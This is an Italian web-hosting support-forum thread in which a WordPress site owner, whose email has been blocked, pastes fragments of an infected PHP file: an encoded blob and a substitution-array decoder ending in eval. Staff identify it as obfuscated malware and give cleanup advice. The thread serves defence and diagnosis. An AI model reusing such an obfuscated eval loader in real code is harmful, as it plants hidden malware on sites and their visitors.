Visualizzazione risultati 1 fino 5 di 5

Discussione: Problema con sito altervista + dominio

  1. #1
    travelsdiary non è connesso Neofita
    Data registrazione
    12-07-2014
    Messaggi
    9

    Predefinito Problema con sito altervista + dominio

    Ciao,

    Ho acquistato il dominio di altervista ma ho due problemi al sito:

    1) Mi continua a bloccare le email dicendomi Traffico email temporaneamente bloccato. Mi potete dire qual'è il file infetto per favore?
    Ho provato a disinstallare e reinstallare il tema e anche wordpress ma ancora mi blocca le email! Vi prego, ci sono dietro da diverse notti insonne.

    2) Ho aggiornato wordpress alla nuova versione ma dal pannello di WP e mi è sparita l'associazione con altervista. Non c'è nulla, né relativo alla pubblicità né alle funzioni. Come si fa a ripristinare? Posso disinstallare WP e reinstallarlo dal pannello di altervista?

    sito web: giramundo.it

    Aiutattemi vi prego che non sto facendo altro che cercare di sistemare questi problemi e non ne vengofuori.. grazie :=)

  2. #2
    travelsdiary non è connesso Neofita
    Data registrazione
    12-07-2014
    Messaggi
    9

    Predefinito

    C'è nessuno?

    Mi rivolgo soprattutto allo staff di Altervista.

    Graziee!

  3. #3
    karl94 non è connesso Staff AV
    Data registrazione
    03-10-2005
    Messaggi
    17,744

    Predefinito

    Come hai effettuato l'aggiramento di preciso?

    Solitamente un sito compromesso ha file del tipo search.php dentro la cartella /wp-includes/Text/. Sono file spesso cifrati e non di WordPress (grandi sempre uguali).
    Assicurati inoltre di avere tutti i plugin e temi aggiornati, e di rimuovere quelli che non ti sono necessari.

  4. #4
    travelsdiary non è connesso Neofita
    Data registrazione
    12-07-2014
    Messaggi
    9

    Predefinito

    ciao,

    si in effetti ho trovato un file strano..è tutto scritto così..

    Codice:
    xsOal3GNe3LNxsAK73stXMHfHCufl41ceODJjsHYqXudeT8EXID7FCuflGH38AQlHCWflCWflC'.
    'WflCWflCWflCAKoiAEFCutFCANepyG81+jmVQlHCWflCWflCWflCWflCWflCA'.
    'KoiAEFCutFCANepyG81+dUX1woi9Yo4pGhAZ324Zc7PSto3LNxsAK73sxDbNJlC'.
    'AKoiAEVbZK73jd7wIflN1d7p1JUp1YxMhJlCAKoiAEVXuKUiAcxshajIaflCWflCWflCWflCWflCW'.
    'fl4HYU4sflrifl41ceODJjsOYobLdeXjN23yYoGZ324Zc7PStA3Ld2AIfl4HYU4s4'.
    'xsvYU4yYoGy0MZWflCWflCWflCWflCWflCW3e3Ld2AWJv1W324Zc7PStABTflrW324Zc7PStABT0MZWflCWflCWflCW'.
    cosi via per mille righe..alla fine c'è scritto così..

    Codice:
    $mqayfuy = Array('1'=>'0', '0'=>'O', '3'=>'J', '2'=>'H', '5'=>'q', '4'=>'R', '7'=>'X', '6'=>'B', '9'=>'1', '8'=>'y', 'A'=>'k', 'C'=>'A', 'B'=>'x', 'E'=>'e', 'D'=>'z', 'G'=>'c', 'F'=>'S', 'I'=>'s', 'H'=>'i', 'K'=>'Y', 'J'=>'L', 'M'=>'w', 'L'=>'v', 'O'=>'l', 'N'=>'d', 'Q'=>'7', 'P'=>'M', 'S'=>'t', 'R'=>'r', 'U'=>'2', 'T'=>'F', 'W'=>'g', 'V'=>'U', 'Y'=>'b', 'X'=>'V', 'Z'=>'o', 'a'=>'K', 'c'=>'a', 'b'=>'N', 'e'=>'G', 'd'=>'Z', 'g'=>'D', 'f'=>'I', 'i'=>'9', 'h'=>'n', 'k'=>'8', 'j'=>'T', 'm'=>'E', 'l'=>'C', 'o'=>'m', 'n'=>'6', 'q'=>'3', 'p'=>'h', 's'=>'5', 'r'=>'4', 'u'=>'u', 't'=>'P', 'w'=>'Q', 'v'=>'j', 'y'=>'p', 'x'=>'W', 'z'=>'f');
    eval(fu($v, $mqayfuy));?>
    Come faccio a sapere se ci sono altri file così?

    possibili che anche il database sia infetto?volevo caricarlo in un'altro server ma ho paura che sia infetto...
    Ultima modifica di karl94 : 27-10-2015 alle ore 01.11.56 Motivo: Formattazione

  5. #5
    karl94 non è connesso Staff AV
    Data registrazione
    03-10-2005
    Messaggi
    17,744

    Predefinito

    Citazione Originalmente inviato da travelsdiary Visualizza messaggio
    ciao,

    si in effetti ho trovato un file strano..è tutto scritto così..

    Codice:
    xsOal3GNe3LNxsAK73...c7PStABT0MZWflCWflCWflCW'.
    cosi via per mille righe..alla fine c'è scritto così..

    Codice:
    $mqayfuy = Arr...;?>
    È codice offuscato, tipico di malware.
    Citazione Originalmente inviato da travelsdiary Visualizza messaggio
    Come faccio a sapere se ci sono altri file così?
    Con malware di questo tipo è altamente probabile che lo stesso abbia infettato altri script PHP e che ne abbia addirura creato in cartelle a caso, con nomi pseudo-plausibili.
    Un metodo semplice e rapido per assicurarsi di rimuovere tutto è appunto cancellare tutto quanto dallo spazio web per poi effettuare una nuova installazione pulita.
    Per non perdere i contenuti che hai adesso ti consiglierei di aprire temporaneamente un nuovo account AlterBlog e importare i contenuti lì, quindi convertire il tuo attuale account in AlterBlog (non è strettamente necessario, ma ci sono diversi vantaggi, leggi i pro e i contro prima dell'operazione) e infine importare nuovamente i contenuti dal blog di appoggio.
    Una volta sistemato il tutto poi evita di installare plugin o temi di dubbia provenienza (al di fuori di quelli che trovi sul sito di WordPress): sono le principali fonti di compromissione. E tieni sempre tutto quanto aggiornato.
    Citazione Originalmente inviato da travelsdiary Visualizza messaggio
    possibili che anche il database sia infetto?volevo caricarlo in un'altro server ma ho paura che sia infetto...
    È molto difficile infettare un'installazione WordPress dal database, che io sappia l'unico modo è aggiungere utenze come amministratore, quindi controlla solamente la tabella degli utenti e per sicurezza cambia password.
    Ultima modifica di karl94 : 28-10-2015 alle ore 18.06.52

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •